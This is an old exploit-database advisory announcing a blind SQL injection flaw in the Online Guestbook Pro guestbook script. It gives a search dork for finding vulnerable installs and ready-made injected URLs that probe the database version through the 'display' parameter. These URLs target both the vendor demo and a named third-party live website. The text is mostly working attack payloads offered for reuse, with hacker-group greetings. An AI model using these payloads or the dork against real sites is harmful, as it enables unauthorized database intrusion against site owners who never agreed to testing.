Online Guestbook Pro (display) Blind SQL Injection Vulnerability
{____________________________________}
Author: Hussin X
Home : WwW.IQ-TY.CoM
email: darkangel_g85[at]Yahoo[DoT]com
{____________________________________}
script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php
DorK : Powered by Online Guestbook Pro
Demo :
http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5
http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=4
BuT Results = Forbidden :D
demo to any web
http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=5
http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=4
Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }
end.
# milw0rm.com [2009-04-17]